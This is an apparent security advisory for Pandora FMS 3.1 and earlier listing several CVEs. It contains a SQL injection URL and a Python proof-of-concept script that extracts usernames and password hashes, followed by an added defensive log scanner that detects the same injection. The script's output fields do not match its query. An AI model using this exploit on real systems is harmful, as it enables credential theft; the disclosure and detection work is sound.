Pandora FMS <= 3.1 multiple vulnerabilities

2010-12-01T00:00:00
ID MYHACK58:62201028459
Type myhack58
Reporter Anonymous
Modified 2010-12-01T00:00:00

Description

Pandora FMS is server monitoring software. Versions 3.1 and earlier contain multiple security vulnerabilities, including directory traversal, SQL injection, system command injection and authentication bypass. These may lead to multiple security threats.

[+]info: ~~~~~~~~~
Pandora FMS <= 3.1 SQL Injection
Pandora FMS <= 3.1 Authentication Bypass
Pandora FMS <= 3.1 OS Command Injection
Pandora FMS <= 3.1 Blind SQL Injection
Pandora FMS <= 3.1 Path Traversal and LFI
CVE-2010-4280
CVE-2010-4279
CVE-2010-4278
CVE-2010-4282

[+]poc: ~~~~~~~~~
SQLi:
http://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario

```python
# Pandora Flexible Monitoring System SQL Injection PoC
# Juan Galiana Lara
# Gets the list of users and password from the database
#
# configure cookie & host before use it
# usage
# python sqlinj_users.py
# admin:75b756ff2785ea8bb9ae02c13b6a71f1
# ...

import json
import urllib2

headers = {"Cookie": "PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o"}

url = "http://HOST/pandora_console/ajax.php"
url += "?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1"
url += "/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario"

req = urllib2.Request(url, headers=headers)
resp = urllib2.urlopen(req)

users = json.read(resp.read())
for user in users:
    print(user["id_agente"] + ":" + user["nombre"])
```
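A defensive check for the request shown above, as an added example that is not part of the original advisory: it scans web-server access logs for requests to `ajax.php` whose `id_group` value is not a plain integer. The combined log format, the function names, the sample lines and the assumption that `id_group` should only ever be numeric are introduced here for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
PLAIN_INT_RE = re.compile(r"[0-9]+")  # assumption: id_group is a numeric group id

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2010:10:00:00 +0000] "GET /pandora_console/ajax.php'
    '?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1 HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Dec/2010:10:00:05 +0000] "GET /pandora_console/ajax.php'
    '?page=operation/agentes/ver_agente&get_agents_group_json=1'
    '&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario'
    ' HTTP/1.1" 200 2048',
    '192.0.2.66 - - [01/Dec/2010:10:00:09 +0000] "GET /pandora_console/ajax.php'
    '?page=operation/agentes/ver_agente&get_agents_group_json=1'
    '&id_group=1%2F**%2Fand%2F**%2F1%3D0 HTTP/1.1" 200 2',
    '192.0.2.10 - - [01/Dec/2010:10:00:12 +0000] "GET /pandora_console/index.php HTTP/1.1" 200 900',
]

def suspicious_id_group(log_line):
    """Return the decoded id_group value if it is not a plain integer, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not target.path.endswith("/pandora_console/ajax.php"):
        return None
    params = parse_qs(target.query, keep_blank_values=True)  # percent-decodes values
    if "get_agents_group_json" not in params:
        return None
    for value in params.get("id_group", []):
        if not PLAIN_INT_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_id_group(line)
        if value is not None:
            hits.append((n, value))
    return hits

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print("line %d: non-numeric id_group: %r" % (n, value))
```

Matching on the decoded value rather than the raw query string means percent-encoded variants of the same request are flagged as well.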
